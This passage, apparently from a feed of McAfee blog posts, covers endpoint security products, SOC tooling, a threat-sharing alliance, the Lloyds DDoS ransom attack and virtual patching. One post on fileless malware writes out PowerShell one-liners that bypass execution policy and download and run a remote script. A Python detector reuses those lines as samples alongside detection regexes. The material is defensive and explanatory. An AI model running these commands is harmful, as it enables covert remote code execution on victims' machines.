To eliminate scanning bottlenecks and delays, McAfee MOVE AntiVirus offloads scanning, configuration, and .DAT update operations to an offload scan server which maintains a global cache of files that have already been scanned, thereby avoiding the need for duplicate scans. In an environment of 40,000+ virtual desktops (soon to be 50,000+), only having to scan a given file once—instead of 40,000 or 50,000 times—results in enormous resource savings.

McAfee MOVE AntiVirus also allowed the healthcare company to dramatically reduce the impact of security on storage and eliminate the need to constantly chase resources. “Previously we had to actually stop updates before they had finished when we had less than full capacity—for instance, if we had a failed drive controller on an array,” explains Scott. “In the past, security was taking a back seat to performance. With McAfee MOVE AntiVirus, however, we no longer have to make that compromise.”

In addition, since McAfee MOVE version 4.0 and McAfee ENS are built to leverage the open McAfee Data Exchange Layer (DXL) application framework, they enable the healthcare company’s VDI environment to supplement McAfee Global Threat Intelligence with local threat information from McAfee Threat Intelligence Exchange and other security solutions, such as McAfee Advanced Threat Defense, to enhance detection and prevention of zero-day, unknown threats across the entire environment, including VDI.

Together, McAfee Endpoint Security and McAfee MOVE AntiVirus are strengthening the company’s ability to protect, detect, and correct across its entire endpoint base, physical and virtual, and to continue to adapt in these, to quote Scott, “interesting times” in which we live.


Surviving the Deluge: Lifecycle Support for the SOC
https://securingtomorrow.mcafee.com/business/surviving-deluge-lifecycle-support-soc/
Tue, 14 Feb 2017 16:00:04 +0000

The post Surviving the Deluge: Lifecycle Support for the SOC appeared first on McAfee Blogs.

This blog was written by Barbara Kay.

For the last month, my corner of Northern California has endured record-breaking inundation from the skies, leading to mud slides, downed power lines, road closures, and, in my case at least, propane and power outages. It’s been hard to stay productive, stretching the resources of laptops, UPSes, mobile phones, wood piles, flashlights, candles, and great neighbors. After years of boycotting, I even went back on Facebook to monitor road status through our private group. These sacrifices drive home how simple and seamless our lives can be when systems work together, and how much havoc occurs when something basic fails you.

My real-world experience echoes the reality of modern security operations. Analysts scramble, juggle, and make do as they fight a flood of security alerts, threat intelligence, and news feeds. Architects see the reality of today’s flood and also look to the horizon with storms of sophisticated attacks, organized cyber-pirates, and uncertain economics. CISOs oversee all of this, trying to match limited resources to unlimited expectations.

How are these practitioners coping? According to a just-completed survey of IT decision-makers in 800 enterprises:

  • 71% maintain a security platform that integrates existing and new technologies so their current cybersecurity measures don’t open their organization to new risk.
  • 64% also prefer to acquire overlapping technologies across the stack.
  • 41% partner with third party security service providers, and
  • 37% leverage automated workflows to address lowest level threats.

These strategies form the backbone of an open, resilient security architecture.

  • The platform captures more value from existing investments and factors in issues that point products don’t address, such as overall visibility and operational efficiency
  • Overlapping (not necessarily duplicative defense in depth) technologies help minimize coverage gaps and bridge technology cycles
  • Third parties bootstrap best practice adoption and fill staffing and tools shortages
  • Automation clears away the knowable efficiently to help security systems and experts focus on the unknown and suspicious.

New Options for Operational Excellence

Security operations benefit enormously from this design model, and McAfee is investing to help you get there. Today we proudly announced an expansion of our integrated security operations solution, with the new release of McAfee Enterprise Security Manager 10 as its cornerstone. The redesigned user experience guides and facilitates investigations that explore data and intelligence from any source. Behind the scenes, the SIEM can ingest any type of threat intelligence and automatically correlate it in investigations; the analyst manages and explores these insights through an investigation workspace featuring multiple incident investigation panels on the same tab and a specialized incident management dashboard.

As part of the new user experience, analysts can directly pull down updated content packs for specific use cases on demand. With a few clicks, the analysts populate rules, visualizations, alarms, and dashboards for high-value basic and advanced use cases. These help analysts filter out the knowable to identify the risky and malicious. Content packs are a great way to perform core SIEM functions like monitoring and compliance, but they also make it easy to adopt the more advanced features that support proactive security operations. For example, packs can populate sophisticated, high-speed statistical, rule, risk, and historical correlations of behavior, context, and events. Building on these content packs, users can apply advanced correlations to customize precise and targeted filters, such as a series of specific events on a specific host within a specific time range.

An Ecosystem for Extensibility

Adding to our app catalog, new ESM-integrated partners expand our solutions for customers with more orchestration options, including an integration with Phantom, which won the RSA Innovation sandbox last year, as well as Ayehu and Demisto. These partners complement the native automation in our platform. [To see details on these and other partnerships, including the six user behavior analytics (UBA) partners we highlighted last fall, click here.]

The growing OpenDXL initiative further extends the security operations platform equation, with the release of new open source clients (www.github.com/opendxl). Simple (just a few lines of code) integrations with these clients will let security teams connect open source software, scripts, and in-house or legacy applications to each other, to commercial products, and to McAfee products. This approach fulfills the platform goals for efficient integration of software as well as automation. Analysts can integrate their preferred tools and scripts for tighter operation and automate hugely valuable functions such as: search and scan endpoints for IOCs and malware; query and set file and application reputations; and apply policies, tag systems, move groups and trigger actions for managed systems via the centralized control and policy management of McAfee ePolicy Orchestrator.

In addition to these community resources, the number of independent software vendors supporting DXL has increased 60% since the 2016 RSA Conference. I’m especially pleased to see vendors like TrapX and Check Point publishing rich forms of threat intelligence (deception and IP/Domain/URL reputation, respectively) to improve the capabilities of other applications connected to the DXL communications fabric. As a real-time messaging fabric, DXL offers the ideal place for this exchange of data and service requests.

Services for the SOC

Finally, to help fulfill the need for third party service providers and expertise, McAfee’s Professional Services team has expanded its SOC lifecycle services with a new virtual SOC program. Foundstone Threat Researchers can supplement existing enterprise capabilities with analyst and threat hunter expertise, capacity, and 24/7 coverage. These services add on to emergency incident response, penetration testing, strategic program development, and education services that bring proven expertise to any enterprise.

All of these capabilities will help security operations teams expedite the detection and correction processes. And importantly, they will build in structural support for the long term—improving organizational agility to adapt to the deluge of new threats and requirements. An open and automation-centric design connects controls and operations to feed better protection back in to policies, processes and countermeasures in a threat defense lifecycle.

The Cyber Threat Alliance Steps Up to Boost Protection
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/cyber-threat-alliance-steps-boost-protection/
Tue, 14 Feb 2017 13:00:22 +0000

The post The Cyber Threat Alliance Steps Up to Boost Protection appeared first on McAfee Blogs.

This blog post was written by Vincent Weafer.

With each new cyber threat report, we learn about the increasing volume of new, complex threats appearing across a myriad of server systems, networking equipment, personal computing platforms, and IoT devices. We also read about the real-world challenges that information security professionals face when attempting to identify, scope, and prioritize security events generated by their security systems.

In some environments, this volume can be measured in the millions or tens of millions of events per day. Security practitioners need help identifying the under-the-radar, high-risk incident and breach events from the huge volume of legitimate but less critical security events, and they need help automating and coordinating their security protection actions across multiple technologies and vendors so they can decrease the time to protect.

Enter the Cyber Threat Alliance. The CTA has grown from a research collaboration between McAfee, Palo Alto Networks, Symantec, and Fortinet into a newly incorporated “not for profit” organization that combines the threat intelligence capabilities of some of the top companies in the cybersecurity industry to tackle the problem of isolated knowledge, which limits each company’s ability to protect its customers as quickly as possible. Also announced this week is the addition of Cisco and Check Point as founding members.

CTA member executives Chris Young, Senior VP and General Manager, McAfee; Michael Daniel, president, Cyber Threat Alliance; Mark McLaughlin, chairman and CEO, Palo Alto Networks; Amnon Bar-Lev, President, Check Point; Marty Roesch, Chief Architect, Cisco Security; Greg Clark, CEO Symantec; Ken Xie, founder, chairman of the board and CEO, Fortinet.

The CTA is focused on tackling the problem of fractured intelligence in the cybersecurity market, and so the organization has created a dynamic real-time trust exchange for threat indicator sharing, validation, and monitoring. Gathering, contextualizing, and sharing knowledge among CTA members using this automated exchange will enable us to protect customers in real time and prioritize resources based on collective knowledge.

At McAfee, we believe in the power of together—the power of sharing intelligence to strengthen critical infrastructure and protect our customers. We are very excited about the potential for the Cyber Threat Alliance. To learn more, visit www.cyberthreatalliance.org. To learn more about threat intelligence sharing and McAfee’s part in that effort, visit www.mcafee.com/threatintelligencesharing. If you are part of the security vendor community and want to learn more about becoming a member of the CTA, please email membership@cyberthreatalliance.com.

Mission Made Possible: The Open Integration Time Machine
https://securingtomorrow.mcafee.com/business/security-operations/mission-made-possible-open-integration-time-machine/
Mon, 06 Feb 2017 17:16:44 +0000

The post Mission Made Possible: The Open Integration Time Machine appeared first on McAfee Blogs.

This blog was written by Barbara Kay.

A fast-forward button for integration to a unified security architecture.

One of the reasons why the Mission Impossible premise has resonated across the generations is that all of us, at one time or another, are handed projects that seem to come with that label. Unfortunately, if you’re like me, you feel more like Wile E. Coyote holding that bomb as it explodes than like the cool Tom Cruise, or the unflappable Peter Graves if you are an old-school fan.

It seems I am always searching for the magical fast-forward button or time machine that allows me to bend the laws of time and physics to defuse the bomb and save the day.

Impossible? Maybe not always. Consider the following scenario:

The architect for ALPHA, which is merging with another company, ZED, is trying to sort through and integrate ZED’s application software and data with ALPHA’s systems to create a unified security operations environment. In 60 days, the security infrastructure has to be 1) functional, 2) compliant, and 3) reliable. And of course, the analysts won’t tolerate any visible change, such as slower performance, loss of features, or longer wait times for searches, reports, or visualizations.

Our hero has figured out which data and applications to keep and connect. In some cases systems will run side by side before one eventually replaces the other: some of ZED’s software is more modern and capable than ALPHA’s, and both companies have some existing (legacy) software that can’t be shut down anytime soon because of compliance or mission-critical functions. So our hero knows which assets he cares about. Now he has to make it all talk together. In 60 days.

One day, our hero is blissfully sipping tea while researching integrations from his key vendors, looking for APIs and scripting options. Suddenly, the CISO comes in with an update from the board meeting: accelerate the merger’s close by 30 days, because the timing is helping the competition disrupt deals. That means he has to get the integrations done in half the time. Our hero needs a fast-forward button for the plan.

Now the bomb is ticking down. There’s no peace in the architect’s cube. The “to do” list of integrations looks way too long. Precious few of the commercial vendors offer the necessary integrations off the shelf, and he can’t believe how few publish APIs or scripting frameworks for self-service. Open source would help, but that code requires validation and testing. How the heck is he going to pull this off? 16-hour days?

Our scene advances as the CISO checks back in the next morning. While the architect was caffeinating for a long day of writing custom integrations, the manager was breakfasting with a CISO for a health care provider. That CISO was talking about the rollercoaster of the last few years, with one merger per year. But they had found a time machine. Last year, her team used OpenDXL to integrate the two companies’ applications and had great results. OpenDXL Python scripts connected all the apps to a common application framework. This approach made it easier to add apps and data sources as they matured their requirements, and also to insulate systems from direct dependencies. This abstraction gave them more flexibility to distribute and evolve the underlying systems as well. It was the best merger experience they’d had in 5 years, and the CISO felt ready to handle whatever the Board dealt out next with aplomb.

The architect was already googling for “OpenDXL”. Even if the story were only half true, it had to be worth a shot. On GitHub.com/opendxl lay a treasure trove of integration examples, free downloads, and test software for integrating applications. A link to mcafee.com/dxl showed that several of the company’s targeted applications and vendors were already integrated with DXL. 

Fast forward. It’s 30 days later, and our hero has made it. Systems running, compliance audits passed, uptime goals met. Whew. And an unexpected benefit – because DXL has a real-time data exchange, several of the SecOps team’s tedious serial workflows had gotten FASTER. Maybe the fast forward button was stuck on. That was a technology glitch to get excited about. And when the CISO handed out a bonus check for meeting the date, the day got even better.

If you think about it, the best stories on Mission Impossible were always the ones where the tools to solve the case were already available. It was just a matter of knowing where to look. So what are you waiting for? The clock is ticking…

Interview with a Lead Information Security Engineer about His Company’s Experience Migrating to McAfee Endpoint Security
https://securingtomorrow.mcafee.com/business/interview-lead-information-security-engineer-companys-experience-migrating-mcafee-endpoint-security/
Thu, 02 Feb 2017 18:16:23 +0000

The post Interview with a Lead Information Security Engineer about His Company’s Experience Migrating to McAfee Endpoint Security appeared first on McAfee Blogs.

Chris T. is the lead information security engineer on a team that oversees a host of McAfee endpoint and network products at his U.S. insurance company with approximately 8,000 endpoints. The company recently migrated endpoints to ENS 10.2 and plans to migrate to ENS 10.5 in the next three months.

Q. What was the driving factor in the decision to migrate to McAfee Endpoint Security (ENS)?
A. About five years ago we desired to consolidate our information security solutions and create a more manageable security footprint. We had products all over the place, each with its own agent; it worked, but it wasn’t the ideal situation. So when ENS came along, we seized the opportunity to simplify security management and shrink our security footprint. Implementing McAfee Endpoint Security represents our first step toward establishing a more refined, smaller security footprint and easier management.

Q. Did you wait until you had an upcoming endpoint renewal?
A. No. We migrated mid-contract. We don’t base our technology upgrades on contract dates; we do what makes the most sense when it makes the most sense. So the fact that the upgrade was free for us (and many users of McAfee legacy endpoint protection) didn’t make that big a difference for us; we just wanted to reap the benefits of the newer, better endpoint protection as soon as possible.

Q. What was your migration experience like?
A. After a very positive experience beta-testing McAfee Endpoint Security 10.2, we deployed it, including its three core components—Threat Prevention, Web Control, and Firewall—to the majority of our approximately 8,000 Windows-based nodes. We used the McAfee migration tool to copy security policies from our Complete Endpoint Threat Protection suite to Endpoint Security. We could have migrated much faster—migration itself is fairly straightforward—but we took advantage of the migration to “clean house”—to eliminate extra legacy baggage and extraneous files and to fine-tune policies and settings.

In the next three months, we plan to migrate all of our 8,000 Windows nodes to ENS version 10.5 as part of our enterprise rollout of Windows 10. McAfee ENS version 10.5 will be a core component of our desktop image. In version 10.5, we are looking forward to even better performance.

Q. What has been the biggest benefit so far from deploying McAfee Endpoint Security?
A. In my mind the biggest benefit of migrating to McAfee Endpoint Security has been improved performance. Users who didn’t have issues with virus scan impact beforehand don’t even realize a change has been made. But for the users who complained, the difference is enormous. On machines with tens of thousands of archive files and some other legacy devices, anti-malware scans could run for days. We targeted those vocal complainers as some of our first for migration to the new endpoint security framework. As soon as their machines were upgraded, their calls [to the IT help desk] stopped.

The overall performance [gain] by consolidating the tools has been rather dramatic. For example, desktops that used to experience 90-95 percent spikes in CPU utilization during anti-virus scans now reach at most 30-35 percent utilization. The customer experience, which is really our end game, has just been dramatically improved.

Q. End users are obviously happier and more productive now. What about security operations?
A. We save a tremendous amount of time. With improved protection at the endpoint, we spend fewer hours reimaging desktops and performing other remediation. Furthermore, by eliminating the need to troubleshoot issues related to legacy software, McAfee Endpoint Security has saved our team countless man-hours each week.

Q. What would you tell other companies who are considering whether to migrate from legacy endpoint protection?
A. McAfee Endpoint Security is, to use an overused but apt term, ‘state of the art.’ It represents the next evolution of endpoint protection. It’s more stable, more efficient, and more accurate. It is definitely worth migrating to.
Fileless Malware Execution with PowerShell is Easier than You May Realize
https://securingtomorrow.mcafee.com/business/fileless-malware-execution-with-powershell-is-easier-than-you-may-realize/
Thu, 02 Feb 2017 14:00:03 +0000

The post Fileless Malware Execution with PowerShell is Easier than You May Realize appeared first on McAfee Blogs.

This blog post was written by Teresa Wingfield.

Fileless Malware Execution with Microsoft PowerShell

Fileless malware is an attack that occurs by methods such as embedding malicious code in scripts or loading malware into memory without writing to disk. PowerShell can run a script directly in memory; hence, it is increasingly being used to perpetrate fileless attacks. Since the file never gets copied to disk, it is easy to bypass endpoint security that typically depends on file I/O to detect threats.

You may think that you are protected from fileless malware because your PowerShell execution policies are set to “Restricted” so that scripts can’t run. However, attackers can easily bypass these policies as shown in the following examples.

Loading scripts directly in memory

An attacker can perform remote execution of a script by directly executing it in memory to bypass endpoint security. Here is a command line example that uses the DownloadString method to download content from a remote location to a buffer in memory:

powershell.exe -ep Bypass -nop -noexit -c iex ((New-Object Net.WebClient).DownloadString('https://[website]/malware.ps1'))

The purpose of the “Bypass” parameter is to bypass execution policies so that administrators can remotely execute commands. However, attackers can use the same parameter to bypass security. Because using it doesn’t result in any configuration change, it’s a common choice for evading security controls.

Running scripts without the default PowerShell interpreter

Administrators can lock down PowerShell and other interpreters based on file extension. While you may have blocked execution of an extension such as .ps1, an attacker can bypass that control by using another extension. For example, PowerShell’s Get-Content can read the content of a .ps2 malware script and pass it to Invoke-Expression (iex) for execution:

powershell.exe -ep Bypass "& {Get-Content .\malware.ps2 | iex}"

This is a security issue since the iex cmdlet opens up the script to injection attacks.

Running system interpreters such as Powershell.exe in interactive mode

Once attackers get hold of the system, they can directly execute malicious commands using PowerShell.exe in interactive mode.

How McAfee Application Control Helps Stop Fileless Malware

McAfee Application Control is a whitelisting solution that blocks unauthorized applications and code from running on servers, desktops, and fixed-function devices. With its advanced execution control, this solution can prevent attacks that bypass file I/O. McAfee Application Control can block execution of scripts based on command line parameters using common interpreters such as PowerShell and wscript and can block PowerShell from running in interactive mode.

McAfee Application Control also provides the flexibility to combine rules based on file name, process name, parent process name, command line parameters and user name as shown in the screenshot below. For example, you can create a rule to block execution of a PowerShell script that uses “Bypass” as a command line argument for execution by an unauthorized user, even a local administrator. You can also use a regular expression to create generic policies. For example, .*\bi["'`]*e["'`]*x\b.* blocks Invoke-Expression.

Often attackers use Word or Excel attachments in email to execute PowerShell or a script for an attack. Using McAfee Application Control, you can specify a parent process name as word.exe, excel.exe or a browser to prevent execution of PowerShell or another interpreter.
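The rules described above all key off observable launch details: the command line, the parent process, and the user. The following Python is an added example, not McAfee Application Control logic, that applies those same checks to a handful of constructed process-creation events. The event field names, the authorized-user list, the parent-process list (which adds winword.exe, the actual Word binary name, to the word.exe and excel.exe named above) and the sample command lines (the post’s two examples plus three made up for the test, including one benign deployment run) are assumptions; the Invoke-Expression pattern is the one from the post.

```python
"""Added example (not McAfee Application Control code): flag the PowerShell
launch patterns described in the post, using constructed process-creation
events.  Event field names, the authorized-user list, the parent-process
list and the sample command lines are assumptions made for this illustration."""
import re

# The post's generic Invoke-Expression pattern: it also catches the alias
# when it is split with quote or backtick characters, e.g. i`e`x or i"e"x.
IEX_RE = re.compile(r'\bi["\'`]*e["\'`]*x\b', re.IGNORECASE)
# -ep Bypass or -ExecutionPolicy Bypass (PowerShell accepts abbreviated switches).
BYPASS_RE = re.compile(r'-(?:ep|ex\w*)\s+bypass', re.IGNORECASE)
# Content pulled from a remote location straight into memory.
DOWNLOAD_RE = re.compile(r'\.download(?:string|data|file)\s*\(', re.IGNORECASE)
# A script with a non-.ps1 extension read by Get-Content and piped to iex.
GC_PIPE_RE = re.compile(r'get-content\s+\S+\s*\|\s*i["\'`]*e["\'`]*x\b', re.IGNORECASE)

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Office applications and browsers that should not normally spawn an interpreter
# (the post names word.exe and excel.exe; winword.exe is the real Word binary name).
SUSPICIOUS_PARENTS = {"word.exe", "winword.exe", "excel.exe",
                      "chrome.exe", "firefox.exe", "iexplore.exe"}
# Constructed allow list: the only account permitted to use -ep Bypass.
AUTHORIZED_BYPASS_USERS = {"CORP\\svc-deploy"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def assess(event: dict) -> list:
    """Return the sorted list of findings for one process-creation event."""
    if basename(event["image"]) not in POWERSHELL_IMAGES:
        return []
    cmd = event["command_line"]
    findings = []
    if BYPASS_RE.search(cmd) and event["user"] not in AUTHORIZED_BYPASS_USERS:
        findings.append("execution-policy-bypass")
    if IEX_RE.search(cmd):
        findings.append("invoke-expression")
    if DOWNLOAD_RE.search(cmd):
        findings.append("remote-download")
    if GC_PIPE_RE.search(cmd):
        findings.append("get-content-piped-to-iex")
    if basename(event["parent_image"]) in SUSPICIOUS_PARENTS:
        findings.append("office-or-browser-parent")
    # A bare "powershell.exe" with no arguments opens an interactive session.
    if len(cmd.split(None, 1)) == 1:
        findings.append("interactive-session")
    return sorted(findings)


def triage(events: list) -> dict:
    """Map each event id to its findings; empty lists are the events to leave alone."""
    return {e["id"]: assess(e) for e in events}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events: 1 and 2 are the post's command lines, 3-5 are made up.
SAMPLE_EVENTS = [
    {"id": 1, "image": PS, "parent_image": r"C:\Windows\explorer.exe", "user": "CORP\\alice",
     "command_line": r"powershell.exe -ep Bypass -nop -noexit -c iex ((New-Object Net.WebClient).DownloadString('https://example.invalid/malware.ps1'))"},
    {"id": 2, "image": PS, "parent_image": r"C:\Windows\explorer.exe", "user": "CORP\\alice",
     "command_line": r'powershell.exe -ep Bypass "& {Get-Content .\malware.ps2 | iex}"'},
    {"id": 3, "image": PS, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "user": "CORP\\bob", "command_line": r'powershell.exe -nop -c "i`e`x $s"'},
    {"id": 4, "image": PS, "parent_image": r"C:\Windows\explorer.exe", "user": "CORP\\bob",
     "command_line": "powershell.exe"},
    {"id": 5, "image": PS, "parent_image": r"C:\Windows\System32\svchost.exe", "user": "CORP\\svc-deploy",
     "command_line": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\ops\inventory.ps1"},
]

if __name__ == "__main__":
    for event_id, findings in triage(SAMPLE_EVENTS).items():
        print(event_id, findings or "no findings")
```

Event 5 is the reason the user check exists: the same Bypass switch that is suspicious from an interactive user is routine from a deployment service account, and a rule that ignores the user would either block legitimate automation or have to be loosened for everyone.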

Learn More

Advanced execution control provides a wide range of options for building robust security. By the way, McAfee Application Control also helps prevent exploitation when using approved binaries and system tools such as InstallUtil, regsvc and Regedit. If you’re interested in learning more click here.

References

Loeb, Larry, “Fileless Malware Loaded Into Memory via PowerShell”, Security Intelligence, 16 March 2016, https://securityintelligence.com/news/fileless-malware-loaded-into-memory-via-powershell/
Target of Massive DDoS Attack and Ransom Demand, Lloyds Banking Group Manages to Fend off Cybercriminals
https://securingtomorrow.mcafee.com/business/target-massive-ddos-attack-ransom-demand-lloyds-banking-group-manages-fend-off-cybercriminals/
Mon, 30 Jan 2017 18:51:59 +0000

The post Target of Massive DDoS Attack and Ransom Demand, Lloyds Banking Group Manages to Fend off Cybercriminals appeared first on McAfee Blogs.

This blog was written by Maneeza Malik.

In a matter of 48 hours, over 20 million customers couldn’t check their bank accounts online. And it’s all because of two people. Two cybercriminals, to be exact, who worked in tandem to conduct a DDoS (distributed denial of service) attack against Lloyds Banking Group. The end goal? To demand a ransom from the banking group, which they knew would be desperate to restore access for its irritated customers.

So how exactly did this DDoS attack work? To start, the cybercriminals bombarded the widely used British bank’s online platform with millions of fake requests designed to grind the group’s systems to a halt. That halt lasted almost three days, denying access to millions of customers across the U.K.

Then, the pair sent an email to a Lloyds Bank executive, pretending to be a consultant offering to restore the bank’s system and get it back online for a small fee of 100 Bitcoin (£75,000 / $94,000). Luckily, the disguised ransom extortion failed: the cybercriminals’ bitcoin address still has a zero balance with zero transactions. As an added bonus, it seems no accounts were hacked or compromised during the attack, and service has returned to normal.

Lloyds’ IT security experts are to thank for that: they “geo-blocked” the source of the attack, a technique that effectively drops a portcullis over the servers launching the attack, although it also stopped legitimate customer requests from that area.

Though no customer data has been stolen and service is back online, this cyberattack is an unfriendly reminder about the nature of DDoS attacks, their ability, and their true impact.

Joe Bernik, McAfee CTO for Financial Services, noted that the attack is nothing new, but attacks like it aren’t going anywhere. “As one of the oldest forms of internet-borne attacks, DDoS attacks are effective and popular because the internet architecture and protocols it uses easily lend themselves to this form of attack. Therefore, it makes sense that the attack on Lloyds’ banking platform is similar to the DDoS attacks that impacted large U.S. banks in 2013 and 2014 as well.”

Bernik continued, “Adding to this ease, DDoS attacks are highly visible by nature, and easy to perform, given the availability of ‘for hire’ botnets.  It’s also important to remember that—especially in cases like Lloyds Bank—a DDoS attempt can be part of a larger attack and could just be a detractor used to redirect security resources.”

Indeed, such attacks are something all banks need to be aware of in order to be on high alert. They need to look for threats and evasive attacks across their entire network and across all omni-banking touch points.

There is nothing unique here. Yes, DDoS attacks are here to stay, as are cyber threats and attacks of all sorts. The bigger question is how banks can shift their security posture to take a more offensive stance rather than always standing at the receiving end of the fire hose; granted, that’s easier said than done. They also need greater visibility, a holistic view of their security posture, rather than multiple myopic lenses that hamper the ability to proactively detect and block attacks. What did we learn from this attack on Lloyds? Customers started to report that they could not access their accounts, and that is what triggered an alert. Detecting and blocking attacks at the onset will continue to be both a challenge and a desired goal for banks, whether the attack is a DDoS, a zero-day, or some other evolving and emerging threat.

The post Target of Massive DDoS Attack and Ransom Demand, Lloyds Banking Group Manages to Fend off Cybercriminals appeared first on McAfee Blogs.

Fortune 500 Company’s Information Security Team Saves 20 Hours Each Week by Migrating to McAfee Endpoint Security https://securingtomorrow.mcafee.com/business/fortune-500-companys-information-security-team-saves-20-hours-week-migrating-mcafee-endpoint-security/ https://securingtomorrow.mcafee.com/business/fortune-500-companys-information-security-team-saves-20-hours-week-migrating-mcafee-endpoint-security/#respond Thu, 19 Jan 2017 20:13:15 +0000 https://securingtomorrow.mcafee.com/?p=68081 For HollyFrontier Director of IT Infrastructure Edwin Drayden, the primary driver for migrating to McAfee Endpoint Security 10 was not better performance or consolidation of legacy products. It was the ability to integrate new endpoint protection framework with his favorite McAfee product, McAfee Advanced Threat Defense (ATD) dynamic sandboxing. Under Drayden’s leadership, HollyFrontier, a Fortune […]

The post Fortune 500 Company’s Information Security Team Saves 20 Hours Each Week by Migrating to McAfee Endpoint Security appeared first on McAfee Blogs.

For HollyFrontier Director of IT Infrastructure Edwin Drayden, the primary driver for migrating to McAfee Endpoint Security 10 was not better performance or consolidation of legacy products. It was the ability to integrate the new endpoint protection framework with his favorite McAfee product, McAfee Advanced Threat Defense (ATD) dynamic sandboxing.

Under Drayden’s leadership, HollyFrontier, a Fortune 500 petroleum refining company with five refineries in the mid-United States, recently migrated 90 percent of its 3,600 McAfee Complete Endpoint Threat Protection suite nodes to McAfee Endpoint Security 10.2. Drayden knew that the more intelligent, more collaborative McAfee Endpoint Security would enhance the defenses of the company’s integrated security architecture, in which McAfee SIEM, IPS, and other solutions play key roles. But he was most excited about the stronger threat detection and faster response enabled by integrating the new endpoint protection framework with McAfee ATD via McAfee Threat Intelligence Exchange.

Drayden becomes animated when he talks about McAfee ATD: “It’s awesome to be able to see something a little strange from a packet perspective…[and be] able to take it to the cloud and explode it, to see what kind of threat vectors fit… I love that. And to do it in such a short timeframe; it’s really incredible.”

At HollyFrontier, now that McAfee Endpoint Security is integrated with McAfee Threat Intelligence Exchange and McAfee ATD (via the Data Exchange Layer, or DXL), a questionable file that attempts to execute on an endpoint is immediately contained and submitted to ATD for deep analysis. While ATD analyzes the file, combining signatures, reputation, and real-time emulation with in-depth sandboxing to detect sophisticated, evasive threats, the Dynamic Application Containment (DAC) capability of McAfee Endpoint Security 10 keeps the file isolated on the endpoint where it first appeared, at ‘patient zero,’ until a verdict comes back.

As Drayden had anticipated, this integration of McAfee Endpoint Security and McAfee ATD has indeed had a tremendous positive impact on security operations, especially by detecting and containing ransomware before it requires serious remediation. “There were quite a few instances in our environment of ransomware that no longer exist,” says Drayden. “I’d say that’s easily 40 hours [saved] every two weeks.”

Drayden also expresses pleasure at how simple and straightforward the migration to McAfee Endpoint Security was using the McAfee ePolicy Orchestrator® (ePO™) central console. Within seven days after initial testing, HollyFrontier’s small information security staff migrated to version 10.2 of the new endpoint protection framework and its Threat Prevention module, including Dynamic Application Containment (DAC) functionality, across 3,200 nodes. The company plans to migrate to version 10.5 within 30 days.


In addition, migrating to the McAfee Endpoint Security 10 had minimal impact on end users, who either didn’t notice anything had changed or ceased complaining. “Once [the migration] was done, it was done,” Drayden notes. “It’s been pretty quiet ever since [across] literally every single endpoint in the whole infrastructure.”

In sum, says Drayden, HollyFrontier migrated to McAfee Endpoint Security 10 “to get a quality product and watch it attach upstream to everything else.” Once it was deployed, he says, “I felt better; I could sleep at night because I knew that ENS [McAfee Endpoint Security 10] works.”

To watch a short video of Drayden sharing about his experience with ENS and McAfee, click here and get your questions answered by tweeting @McAfee_Business.

A New Year with No Patch Management Hangover https://securingtomorrow.mcafee.com/business/cloud-security/new-year-no-patch-management-hangover/ https://securingtomorrow.mcafee.com/business/cloud-security/new-year-no-patch-management-hangover/#respond Tue, 17 Jan 2017 14:00:10 +0000 https://securingtomorrow.mcafee.com/?p=67774 This blog post was written by Teresa Wingfield. The frequency of database and application vulnerabilities is increasing.  Testing and deploying vendor-issued patches is an ongoing, arduous process that results in a time window of system vulnerabilities that exists until IT staff can bring business-critical databases and applications off-line and deploy patches. The longer the vulnerability […]

The post A New Year with No Patch Management Hangover appeared first on McAfee Blogs.

This blog post was written by Teresa Wingfield.

The frequency of database and application vulnerabilities is increasing. Testing and deploying vendor-issued patches is an ongoing, arduous process, and it leaves a window of exposure that lasts until IT staff can take business-critical databases and applications offline and deploy the patches. The longer that window, the greater the security risk.

Traditional Patch Management Challenges

With the growth in vulnerabilities, many organizations struggle to remediate using traditional patch management strategies. Our new white paper from Aberdeen Group, “Beyond the Patch: Reducing the Risk of Database and Application Vulnerabilities,” identifies the key shortcomings of traditional patch management that make remediation so painful:

  • Vendor patches may not be available
  • Vendor patching may not be possible or practical
  • Vendor patching is costly, time consuming and inconvenient
  • Vendor patching does not support up-to-date visibility into what’s happening in your environment

In fact, Aberdeen found that in a $100 million company with 100 database instances, vendor patching over the course of one year is likely to be complex and time consuming.

Figure: Aberdeen database patching statistics

A Virtual Patching Strategy

This New Year you may want to try a different patch management approach. Compared with traditional vendor patching, virtual patching can be a highly effective strategy for addressing both the likelihood and the business-impact aspects of security-related risk. Aberdeen defines virtual patching as establishing a policy enforcement point, external to the resource being protected, that identifies vulnerability exploits before they reach their target. Virtual patch management offers the following benefits:

  • Automatic updates, since no direct modification of the protected resource is required.
  • Reduced risk, since virtual patching shrinks the window of vulnerability when vendor patching is not available, not possible, not practical, or deferred to avoid cost and inconvenience.
  • Lower business impact, since virtual patching avoids the lost user productivity and lost revenue incurred while databases and applications are disrupted by traditional vendor patching.
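The “policy enforcement point external to the resource” in Aberdeen’s definition is easiest to see in code. The block below is an added example, not McAfee Virtual Patching for Databases: a small proxy in front of an in-memory SQLite database that normalises each statement and refuses anything matching a virtual-patch rule, with the database itself left untouched. The three rules, the table names, the sample data and the “vulnerable” built-in `vuln_extract()` are all hypothetical.

```python
import re
import sqlite3

# Virtual patch rules as (id, pattern over the NORMALISED statement). The rules and the
# "vulnerable" built-in vuln_extract() are hypothetical; a product's rules come from its
# vendor's vulnerability research and are updated without touching the database.
RULES = [
    ("VP-001 call to hypothetical vulnerable built-in vuln_extract()", re.compile(r"\bvuln_extract\s*\(")),
    ("VP-002 stacked statement after a semicolon", re.compile(r";\s*[a-z]")),
    ("VP-003 UNION read of the credentials table", re.compile(r"\bunion\b.*\bfrom\s+credentials\b")),
]


def normalise(sql: str) -> str:
    """Strip comments, collapse whitespace and lower-case, so a rule written once also
    catches 'uNiOn/**/SELECT'-style evasion."""
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)  # block comments
    sql = re.sub(r"--[^\n]*", " ", sql)               # line comments
    return re.sub(r"\s+", " ", sql).strip().lower()


def match_rule(sql: str):
    """Return the id of the first virtual patch the statement trips, or None."""
    norm = normalise(sql)
    for rule_id, pattern in RULES:
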